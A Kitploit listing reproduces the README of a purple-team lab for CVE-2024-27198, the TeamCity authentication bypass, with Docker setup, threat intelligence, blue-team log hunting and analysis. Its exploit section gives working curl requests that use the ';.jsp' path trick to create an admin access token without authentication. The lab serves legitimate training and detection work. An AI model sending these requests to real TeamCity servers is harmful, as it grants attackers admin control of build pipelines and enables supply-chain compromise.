Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-27198_Lab — Lab for the CVE-2024-27198 | Kitploit
أدوات/GitHubGitHub/cmpnn-romain/cve-2024-27198_lab
Vulnerability AnalysisExploitationWeb Application ExploitationCTFPenetration TestingThreat IntelligenceIntrusion DetectionLearning & EducationIncident ResponseLog AnalysisLabs & Practice
17منذ 16 أياملم تتم المراجعة بعد
GitHub
cmpnn-romain/cve-2024-27198_lab

CVE-2024-27198_Lab

Lab for the CVE-2024-27198

عرض المستودع

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
المحتوى غير متوفر باللغة المطلوبة. عرض النسخة الإنجليزية.


CVE-2024-27198_Lab

Vulnerability Research & Purple Team Demonstration Lab for JetBrains TeamCity Authentication Bypass (CVE-2024-27198)

Table of Contents

  • About The Project
    • CVE Details
    • Built With
  • Threat Intelligence & OSINT
    • Real-World Impact & Exploitation
    • Why this CVE is Critical
  • Getting Started
    • Prerequisites
    • Installation & Lab Setup
  • Steps to Reproduce & Exploit
    • Login Portal
    • Test the Vulnerability
    • Generate Admin Token
    • Verify Token
    • Delete the Token
    • Blue Team: Hunting for IoCs in Logs
    • Stop the Containers
  • Mitigation & Detection
    • Technical Analysis (CWE-288)
    • Indicators of Compromise (IoCs)
    • Log Detection (Sigma Rule)
    • SIEM Live Demo (Blue Team)
    • Remediation
    • Network Detection (Suricata / Snort Rule)
    • Test the Patched Version
  • Links

About The Project

TeamCity provides an admin-only page for token management that is not protected by authentication. This allows an unauthenticated user to generate an access token for the admin user if they can find an ID of an existing user.

This repository contains a complete reproducible Dockerized lab with both vulnerable (:8111) and patched (:8112) TeamCity environments, automated exploitation scripts (exploit.py), Blue Team log-hunting walkthroughs, and a live SIEM event simulator (siem_simulator.py).

CVE Details

  • CVE ID: CVE-2024-27198
  • CWE: CWE-288 (Authentication Bypass Using an Alternate Path or Channel)
  • CNA: JetBrains s.r.o.
  • Base Score: 9.8 CRITICAL
  • Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    • AV:N — Network
    • AC:L — Low
    • PR:N — None
    • UI:N — None
    • S:U — Unchanged
    • C:H — High
    • I:H — High
    • A:H — High

Built With

  • Docker
  • Python
  • JetBrains TeamCity
  • Sigma
  • Suricata

Threat Intelligence & OSINT

Real-World Impact & Exploitation

  • CISA KEV Catalog: Added on March 7, 2024, confirming active exploitation in the wild.
  • Threat Actors: Exploited by multiple ransomware groups and APTs, notably the BianLian ransomware group and the Jasmin ransomware variant. Attackers used this bypass to create rogue administrator accounts, deploy malicious plugins, and execute arbitrary code (RCE) to move laterally within victim networks.
  • Target Profile: CI/CD pipelines are high-value targets (Supply Chain Attacks). Compromising TeamCity allows attackers to inject malicious code into software builds, steal source code, and extract deployment secrets (AWS keys, certificates).

Why this CVE is Critical

The vulnerability lies in the REST API routing mechanism. By appending specific characters (like ?jsp=/app/rest/...;.jsp) to an unauthenticated endpoint, attackers can trick the TeamCity web server into routing the request to an authenticated endpoint while bypassing the security filters. This requires zero prior knowledge or access, making it a pure 9.8 CVSS.

Getting Started

To get a local copy of this lab up and running follow these simple example steps.

Prerequisites

  • Docker & Docker Compose
  • Python 3.10+
  • curl

Installation & Lab Setup

  1. Clone the repo
    git clone [email protected]:cmpnn-romain/CVE-2024-27198_Lab.git
    
  2. Change directory
    cd CVE-2024-27198_Lab
    
  3. Start the containers
    docker compose up -d
    
  • Access the vulnerable TeamCity instance at: http://localhost:8111
  • Access the patched TeamCity instance at: http://localhost:8112

Steps to Reproduce & Exploit

Login Portal

Username:

admin

Password:

admin

Test the vulnerability

GET request for a resource without authentication:

curl -i http://localhost:8111/app/rest/users
curl -i http://localhost:8112/app/rest/users

Both should return an error with 401 status code.

Generate a token for admin user

curl -X POST -H "Content-Type: application/json" \
  "http://localhost:8111/hax?jsp=/app/rest/users/id:1/tokens/REDTEAM;.jsp" \
  -d '{"name":"REDTEAM"}'

This should return a token like this (The token is different every time):

eyJ0eXAiOiAiVENWMiJ9.T1AzMHJjY3piNC1QWDlFenpnLXdCUkRuSF84.ZmJlODg3ZDQtNjFmYy00ZGQxLTk2MDAtYmJlYjViZjE4NGFi
curl -X POST -H "Content-Type: application/json" \
  "http://localhost:8112/hax?jsp=/app/rest/users/id:1/tokens/REDTEAM;.jsp" \
  -d '{"name":"REDTEAM"}'

This should return an error with 401 status code because the patched instance does not have the vulnerability.

Verify token

curl -i -H "Authorization: Bearer <TOKEN>" \
  http://localhost:8111/app/rest/users

Should return the list of users.

Delete the token

  1. Go to http://localhost:8111 with admin account.
  2. Click on the profile icon on the top right.
  3. Go to Profile -> Access Tokens.
  4. You will see the "REDTEAM" token.
  5. Simply click Delete next to the token.

Blue Team: Hunting for IoCs in Logs (The Stealth Factor)

During the demonstration on the lab, you can show a massive Blue Team finding: by default, this vulnerability is incredibly stealthy!

  1. Tomcat access logs are disabled by default in the TeamCity Docker image, so the ;.jsp HTTP requests are not logged.
  2. The TeamCity audit log does not log token creation via the REST API.

So how do we catch it? When the attacker cleans up their tracks! When the attacker deletes their rogue token to hide, TeamCity does log that.

Find the attacker covering their tracks in the audit logs:

docker exec teamcity-vulnerable grep "delete_token" /opt/teamcity/logs/teamcity-activities.log

(You will see a log entry indicating that the "REDTEAM" token was deleted).

Stop the containers

docker compose down

Mitigation & Detection

Technical Analysis (CWE-288)

This vulnerability is an instance of CWE-288: Authentication Bypass Using an Alternate Path or Channel. The flaw stems from a path confusion issue between the Tomcat web server and the TeamCity application router. By appending ;.jsp and passing the target REST API endpoint in the jsp= parameter, the initial security filter interprets the request as an unauthenticated request to a public .jsp file (which is allowed). However, the internal router strips the ;.jsp and forwards the request to the restricted /app/rest/ endpoint without enforcing the authentication filter.

تنزيل الأداة